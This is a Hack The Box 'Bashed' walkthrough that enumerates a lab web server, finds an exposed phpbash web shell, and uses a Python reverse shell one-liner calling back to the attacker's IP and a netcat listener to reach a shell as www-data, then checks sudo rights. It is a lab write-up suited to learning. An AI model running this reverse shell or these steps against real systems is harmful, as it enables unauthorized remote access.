👽Bashed Writeup
[File Misconfiguration] [Web]
Nmap
-sC: Performs a script scan using the default set of scripts
-sV: Probe open ports to determine service/version info
-O: Enable OS detection
-oA: Output in the three major formats at once
┌──(kali㉿kali)-[~/HTB/bashed]
└─$ sudo nmap -sC -sV -O -oA nmap_bashed 10.10.10.68 1 ⨯
[sudo] password for kali:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-10 07:18 EST
Nmap scan report for 10.10.10.68
Host is up (0.015s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Arrexel's Development Site
|_http-server-header: Apache/2.4.18 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=1/10%OT=80%CT=1%CU=39439%PV=Y%DS=2%DC=I%G=Y%TM=61DC240
OS:C%P=x86_64-pc-linux-gnu)SEQ(SP=FF%GCD=1%ISR=108%TI=Z%CI=I%II=I%TS=8)OPS(
OS:O1=M54BST11NW7%O2=M54BST11NW7%O3=M54BNNT11NW7%O4=M54BST11NW7%O5=M54BST11
OS:NW7%O6=M54BST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(
OS:R=Y%DF=Y%T=40%W=7210%O=M54BNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
OS:S)
Network Distance: 2 hops
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.33 secondsVisiting the URL http://10.10.10.68/ will bring us to the following web page.
Gobuster
dir: Uses directory/file enumeration mode
-w: Path to the wordlist
-u: The target URL
-f: Append / to each request
-x: File extension(s) to search for
┌──(kali㉿kali)-[~/HTB/bashed]
└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u 10.10.10.68 -f -x php,html
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.68
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php,html
[+] Add Slash: true
[+] Timeout: 10s
===============================================================
2022/01/10 07:36:26 Starting gobuster in directory enumeration mode
===============================================================
/images/ (Status: 200) [Size: 1564]
/index.html (Status: 200) [Size: 7743]
/contact.html (Status: 200) [Size: 7805]
/about.html (Status: 200) [Size: 8193]
/icons/ (Status: 403) [Size: 292]
/uploads/ (Status: 200) [Size: 14]
/php/ (Status: 200) [Size: 939]
/css/ (Status: 200) [Size: 1758]
/dev/ (Status: 200) [Size: 1148]
/js/ (Status: 200) [Size: 3165]
/config.php (Status: 200) [Size: 0]
/fonts/ (Status: 200) [Size: 2095]
/single.html (Status: 200) [Size: 7477]
/scroll.html (Status: 200) [Size: 10863]
===============================================================
2022/01/10 07:40:39 Finished
===============================================================
Visiting the URL http://10.10.10.68/dev/ will bring us to a directory with the following files:
Dirbuster
Fuzzing for the extension sh, py, pl using Dirbuster.
┌──(kali㉿kali)-[~/HTB/shocker]
└─$ dirbuster
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Starting OWASP DirBuster 1.0-RC1Input the following fields into the Dirbuster's GUI:
Target URL
File with list of dirs/files
File extension
Starting dir/file list based brute forcing
Dir found: / - 200
Dir found: /images/ - 200
File found: /index.html - 200
Dir found: /icons/ - 403
File found: /single.html - 200
Dir found: /js/ - 200
File found: /js/jquery.js - 200
File found: /js/imagesloaded.pkgd.js - 200
File found: /js/jquery.nicescroll.min.js - 200
File found: /js/jquery.smartmenus.min.js - 200
Dir found: /demo-images/ - 200
File found: /js/jquery.carouFredSel-6.0.0-packed.js - 200
File found: /js/jquery.mousewheel.min.js - 200
File found: /js/jquery.touchSwipe.min.js - 200
File found: /js/jquery.easing.1.3.js - 200
File found: /js/custom_google_map_style.js - 200
File found: /js/main.js - 200
File found: /js/html5.js - 200
Dir found: /uploads/ - 200
Dir found: /php/ - 200
File found: /php/sendMail.php - 200
Dir found: /css/ - 200
File found: /css/carouFredSel.css - 200
File found: /css/clear.css - 200
File found: /css/common.css - 200
File found: /css/font-awesome.min.css - 200
File found: /css/sm-clean.css - 200
Dir found: /icons/small/ - 403
Dir found: /dev/ - 200
File found: /dev/phpbash.min.php - 200
File found: /dev/phpbash.php - 200
File found: /config.php - 200Visiting the URL http://10.10.10.68/dev/phpbash.php seems to execute a shell session.
We can execute the following commands to test it:
echo $0: Check the name of the running process. In this case, it is 'sh'.
whoami: Display the username of the current user.
sudo -l: list user's privileges or check a specific command.
Since I know the flag for the user is in the file 'user.txt', I executed the following command to find it:
find / -type f -name *.txt | grep user
Netcat
Execute 'nc -lvnp 5566' to create a listener on another terminal.
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 5566
listening on [any] 5566 ...Reverse Shell
Test if the system has Python installed
which python
We are able to get the Python reverse shell code from https://pentestmonkey.net
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.17.239",5566));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'Netcat
Head back to the the terminal where we executed the Netcat listener code.
┌──(kali㉿kali)-[~/HTB/bashed]
└─$ nc -lvnp 5566 1 ⨯
listening on [any] 5566 ...
connect to [10.10.17.239] from (UNKNOWN) [10.10.10.68] 46604
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ Sudo
sudo -l: list user's privileges or check a specific command
$ sudo -l
Matching Defaults entries for www-data on bashed:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL
$ Last updated